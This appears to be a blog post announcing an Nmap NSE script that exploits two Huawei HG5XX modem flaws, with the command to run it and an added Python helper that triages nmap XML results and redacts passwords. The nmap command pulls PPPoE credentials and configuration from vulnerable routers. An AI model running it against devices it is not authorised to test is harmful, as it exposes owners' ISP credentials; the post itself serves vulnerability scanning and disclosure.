Remote credential and configuration disclosure of Huawei HG5XX devices using Nmap.
I have added an NSE script called "http-huawei-hg5xx-vuln" which exploits a couple of vulnerabilities found in Huawei HG5XX modems.
The first vulnerability, which allows an attacker to extract the router's configuration file, was found by Pedro Joaquín of Websec. The second, which lets the attacker extract the PPPoE password, was reported by ADiaz.
The information extracted by "http-huawei-hg5xx-vuln" is:
- PPPoE credentials
- Firmware version
- Gateway IP
- DNS servers 1 and 2
- Network segment
- Active Ethernet and WiFi connections
To obtain the Huawei HG5XX's PPPoE credentials and configuration file with Nmap, run the script against the port the device's web interface listens on (port 80 here):
$ nmap -p80 --script http-huawei-hg5xx-vuln <IP>
If the device is vulnerable, the script reports the extracted values listed above in its output:
Here you can see a video demonstrating "http-huawei-hg5xx-vuln" in action:
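When the script is run across a whole network segment rather than a single modem, the results are easier to handle from Nmap's XML output (-oX) than from the console. The following Python helper is an added example, not the post's own code and not part of the NSE script: it reads that XML, picks out the hosts on which http-huawei-hg5xx-vuln fired, separates vulnerable from non-vulnerable ones and prints a summary with the PPPoE password redacted. It assumes the standard nmap XML layout (a <script id="..." output="..."/> element under each <port>) and that the script reports through Nmap's vulns library, whose "State: VULNERABLE" line is the only wording relied on; the embedded sample scan, including every host address, firmware string and credential, is constructed for the example.

```python
"""Triage nmap -oX output for http-huawei-hg5xx-vuln results.

Added example, not part of the original post or of the NSE script itself.
Assumes the standard nmap XML layout (<script id="..." output="..."/> under
each <port>) and that the script reports through Nmap's vulns library, whose
"State: VULNERABLE" line is the only wording relied on. Every value in the
sample scan below (hosts, firmware string, credentials) is constructed.
"""
import sys
import xml.etree.ElementTree as ET

SCRIPT_ID = "http-huawei-hg5xx-vuln"


def _nmap_attr(lines):
    """Join output lines the way nmap encodes newlines inside an XML attribute."""
    return "&#xa;".join(lines)


# Constructed sample of: nmap -p80 --script http-huawei-hg5xx-vuln -oX scan.xml 192.0.2.1-2
SAMPLE_XML = """<?xml version="1.0"?>
<nmaprun scanner="nmap">
  <host><status state="up"/><address addr="192.0.2.1" addrtype="ipv4"/>
    <ports><port protocol="tcp" portid="80"><state state="open"/>
      <script id="{sid}" output="{vuln}"/>
    </port></ports></host>
  <host><status state="up"/><address addr="192.0.2.2" addrtype="ipv4"/>
    <ports><port protocol="tcp" portid="80"><state state="open"/>
      <script id="{sid}" output="{safe}"/>
    </port></ports></host>
</nmaprun>
""".format(
    sid=SCRIPT_ID,
    vuln=_nmap_attr([
        "",
        "  VULNERABLE:",
        "  Remote credential and information disclosure in Huawei HG5XX modems",
        "    State: VULNERABLE (Exploitable)",
        "    Extra information:",
        "      Firmware version: constructed-fw-1.0",
        "      Gateway IP: 192.0.2.1",
        "      DNS 1: 203.0.113.53",
        "      DNS 2: 203.0.113.54",
        "      PPPoE user: constructed-user",
        "      PPPoE password: constructed-pass",
    ]),
    safe=_nmap_attr([
        "",
        "  NOT VULNERABLE:",
        "  Remote credential and information disclosure in Huawei HG5XX modems",
        "    State: NOT VULNERABLE",
    ]),
)


def is_vulnerable(output):
    """True if the vulns-library 'State:' line reads VULNERABLE (not NOT VULNERABLE)."""
    for line in output.splitlines():
        line = line.strip()
        if line.startswith("State:"):
            return line.split(":", 1)[1].strip().startswith("VULNERABLE")
    return False


def extract_fields(output):
    """Collect 'key: value' lines that follow the 'Extra information:' header."""
    fields = {}
    collecting = False
    for raw in output.splitlines():
        line = raw.strip()
        if line == "Extra information:":
            collecting = True
            continue
        if collecting and ":" in line:
            key, value = (part.strip() for part in line.split(":", 1))
            if value:
                fields[key] = value
    return fields


def parse_script_results(xml_text, script_id=SCRIPT_ID):
    """One dict per host/port on which the script produced output."""
    results = []
    for host in ET.fromstring(xml_text).iter("host"):
        addr_el = host.find("address[@addrtype='ipv4']")
        addr = addr_el.get("addr") if addr_el is not None else "?"
        for port in host.iter("port"):
            for script in port.findall("script"):
                if script.get("id") != script_id:
                    continue
                output = script.get("output", "")
                results.append({
                    "host": addr,
                    "port": int(port.get("portid")),
                    "vulnerable": is_vulnerable(output),
                    "details": extract_fields(output),
                })
    return results


def vulnerable_hosts(results):
    return [r["host"] for r in results if r["vulnerable"]]


def report(results):
    """Summary lines; the PPPoE password is redacted so the triage log does
    not itself become a second credential leak."""
    lines = []
    for r in results:
        state = "VULNERABLE" if r["vulnerable"] else "not vulnerable"
        lines.append("%s:%d %s" % (r["host"], r["port"], state))
        for key, value in sorted(r["details"].items()):
            if "password" in key.lower():
                value = "<redacted>"
            lines.append("    %s: %s" % (key, value))
    return lines


if __name__ == "__main__":
    # Usage: python triage.py scan.xml   (falls back to the constructed sample)
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_XML
    print("\n".join(report(parse_script_results(text))))
```

Matching on the "State:" line rather than on the word VULNERABLE matters because the non-vulnerable report also contains that word ("NOT VULNERABLE"); the field names in extract_fields are taken verbatim from whatever the script prints, so the dictionary keys will follow the real script's wording when run on a real scan.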